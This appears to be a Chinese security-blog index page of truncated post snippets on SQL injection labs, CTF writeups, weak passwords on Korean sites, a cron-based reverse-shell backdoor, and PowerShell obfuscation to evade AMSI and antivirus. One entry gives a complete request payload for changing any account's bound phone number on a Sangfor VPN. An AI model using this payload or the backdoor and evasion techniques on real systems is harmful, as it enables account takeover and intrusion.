点击蓝字 关注我们01 前言某次某个厂商发了一个项目,虽然最后测出来的洞偏出了范围,但是感觉过程还是很有趣的。01 正文首先根据厂商的范围找到他的公众号,...
Less-17 Update Query
因为是UPDATE语句,所以最好还是把剩下的WHERE username=’admin’补上,不然可能所有人密码都变了。所以可以构造的语句是: uname=admin&...
bitbar 漏洞挖掘 实验
给的是一个比特币交易的网站,本地搭建环境之后开始按照文章中的要求来完成6次attack 网站源码和代码都放在这个仓库了 https://github.com/xinyongpeng/bitbar At...
SDCMS 通杀漏洞、SDCMS 时代网站信息管理系统
发布日期:2011-10.3 发布作者:鬼哥 漏洞类型:SQL注射 漏洞版本:通杀sdcms所有版本 漏洞危害:直接导致网站被入侵 漏洞条件:需要知道后台路径 测试版本:sdcms 1.3 最新版(官...
【转载】韩国棒子网站的一些弱口令
这几天因为一些事,一直再搞韩国棒子的站。给一点弱口令,给大家和国内完全不一样。 暂时把账号表达为:username 账号一般为:域名和 admin,其他就要猜了,域名的概率为:...
一条命令实现无文件兼容性强的反弹后门
一条命令实现无文件兼容性强的反弹后门 猪猪侠 (A) | 2015-01-25 20:15 最好用一个不常见的用户执行,任务写入/var/spool/cron/$username (crontab -...
解决windows 无法访问指定设备、路径或文件。你可能没有适当的权限访问该项目。
文件权限出现了问题下面是一些可用的命令行帮助恢复一种替代方法是保存和恢复ACL
小白入门靶机-Pikachu之暴力破解
00—前言靶机项目地址:https://github.com/zhuifengshaonianhanlu/pikachu环境准备:Phpstudy关于上面环境安装搭建的教程网上太多啦,大家第一次接触的...
重置绑定📱号payload:nnhttps://路径/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1nn注意 需要登录之后才可以nn这个payload配合上上次发的推送食用,payload来自【云客侠心】[强]
漏洞|深信服VPN 修改任意账户绑定手机号
https://路径/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TA...
DDCTF-WriteUp
WEBWeb签到题解题思路先是jwt爆破 ./john jwt.txt 发现 secretkey就是输入的 pwd,所以进行伪造const jwt=require('jsonwebtoken');co...
Powershell脚本混淆绕过amsi/av
https://github.com/tokyoneon/Chimera以下是Invoke-PowerShellTcp.ps1的片段$stream = $client.GetStream()[byte...
10